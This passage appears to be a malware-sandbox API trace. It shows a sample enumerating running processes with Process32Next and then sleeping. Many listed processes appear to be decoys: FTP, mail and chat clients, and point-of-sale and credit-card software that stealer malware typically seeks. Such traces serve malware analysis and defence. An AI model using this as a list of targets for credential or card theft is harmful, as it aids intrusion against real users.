szExeFile="spoolsv.exe")) returned 1 [0196.375] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0196.378] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.381] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0196.383] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.413] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0196.460] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0196.462] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0196.464] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0196.467] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0196.469] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0196.471] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.473] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0196.475] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0196.477] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0196.478] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.480] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0196.482] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0196.484] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0196.485] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0196.487] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0196.488] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0196.490] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0196.492] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0196.493] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0196.495] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0196.524] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0196.526] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0196.528] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0196.530] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0196.531] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0196.533] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0196.535] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0196.536] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0196.538] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0196.540] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0196.541] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0196.543] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0196.545] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0196.547] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0196.549] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0196.551] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0196.553] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0196.555] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0196.557] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0196.559] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0196.602] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0196.604] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0196.606] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0196.608] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0196.610] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0196.612] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0196.615] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0196.617] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0196.619] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0196.623] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0196.626] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0196.628] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0196.630] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0196.632] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0196.633] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0196.635] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0196.637] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0196.698] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0196.700] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0196.702] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0196.704] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0196.706] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0196.708] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0196.710] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0196.711] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0196.713] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0196.715] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0196.717] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0196.719] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0196.720] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0196.722] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0196.724] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0196.725] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0196.727] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0196.733] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0196.734] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0196.764] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0196.766] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0196.768] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0196.769] CloseHandle (hObject=0x18f0) returned 1 [0196.769] Sleep 